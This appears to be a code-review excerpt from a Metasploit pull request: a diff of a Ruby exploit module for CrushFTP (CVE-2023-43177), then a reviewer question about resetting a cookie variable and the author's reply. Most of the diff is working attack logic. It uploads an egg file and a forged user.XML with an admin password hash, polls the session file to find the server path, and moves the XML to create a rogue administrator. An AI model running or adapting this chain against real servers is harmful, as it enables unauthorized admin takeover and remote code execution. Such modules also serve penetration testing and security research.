modules/exploits/multi/http/crushftp_rce_cve_2023_43177.rb

```diff
@@ -0,0 +1,688 @@
+      return nil
+    end
+    print_good("Found a writable directory: #{writable_dir}")
+
+    egg_rand = rand_text_hex(10)
+    print_status("Uploading the egg file `#{egg_rand}`")
+    egg_path = File.join(writable_dir, egg_rand)
+    begin
+      upload_file(egg_path, rand_text_hex(3..6), egg_rand, session[:cookie])
+    rescue CrushFtpError => e
+      print_bad("[do_priv_esc_and_check_windows] Unable to upload the egg file: #{e.class} - #{e.message}")
+      return nil
+    end
+
+    admin_password = rand_text_hex(10)
+    user_xml = <<~XML.gsub!(/\n */, '')
+      <?xml version='1.0' encoding='UTF-8'?>
+      <user type='properties'>
+        <username>#{session[:username]}</username>
+        <password>MD5:#{Rex::Text.md5(admin_password)}</password>
+        <extra_vfs type='vector'></extra_vfs>
+        <version>1.0</version>
+        <userVersion>6</userVersion>
+        <created_by_username>crushadmin</created_by_username>
+        <created_by_email></created_by_email>
+        <created_time>#{DateTime.now.strftime('%Q')}</created_time>
+        <filePublicEncryptionKey></filePublicEncryptionKey>
+        <fileDecryptionKey></fileDecryptionKey>
+        <max_logins>0</max_logins>
+        <root_dir>/</root_dir>
+        <site>(SITE_PASS)(SITE_DOT)(SITE_EMAILPASSWORD)(CONNECT)</site>
+        <password_history></password_history>
+      </user>
+    XML
+    xml_path = File.join(writable_dir, 'user.XML')
+    print_status("Uploading `user.XML` to #{xml_path}")
+    begin
+      upload_file(xml_path, user_xml, rand_text_hex(10), session[:cookie])
+    rescue CrushFtpError => e
+      print_bad("[do_priv_esc_and_check_windows] Unable to upload `user.XML`: #{e.class} - #{e.message}")
+      return nil
+    end
+
+    path = nil
+    loop do
+      print_status('Looking for the egg in the session file')
+      session_file = get_session_file
+      if session_file
+        path = check_egg(session_file, egg_rand)
+        break if path
+      end
+      print_status("Egg not found, wait #{datastore['SESSION_FILE_DELAY']} seconds and try again... (Ctrl-C to exit)")
+      sleep datastore['SESSION_FILE_DELAY']
+    end
+    print_good("Found the file system path: #{path}")
+    register_files_for_cleanup(File.join(path, egg_rand))
+
+    cookie = nil
+    begin
+      cookie = get_anon_session
+    rescue CrushFtpError => e
+      print_bad("[do_priv_esc_and_check_windows] Unable to get an anonymous session: #{e.class} - #{e.message}")
+      return nil
+    end
+    admin_username = rand_text_hex(10)
+    vprint_status("The forged user will be `#{admin_username}`")
+    vprint_status("Moving user.XML from #{path} to `#{admin_username}` home folder and elevate privileges")
+    is_windows = path.match(/^[A-Z]:(?<path>.*)/)
+    move_user_xml(admin_username, is_windows ? Regexp.last_match(:path) : path)
+
+    do_logout(cookie)
+    cookie = nil
```

Comment:
Very minor but is setting `cookie = nil` here necessary? It's already been initialized in this context and on line 461 `do_login` is going to set cookie to either `nil` or the cookie found during authentication. 
```suggestion
```

Reply:
`cookie` is explicitly set to `nil` here to make sure the ensure block won't log it out again if the next call to `do_login(admin_username, admin_password)` raises an exception. Without this line, if `do_login` raises an exception, `cookie` will still contain the value of the previous session cookie, which should have been logged out at this point. The ensure block will try to logout the same session again.

I'll add a comment to explain this. Thank you for bringing this to my attention, I agree it is not clear in the code.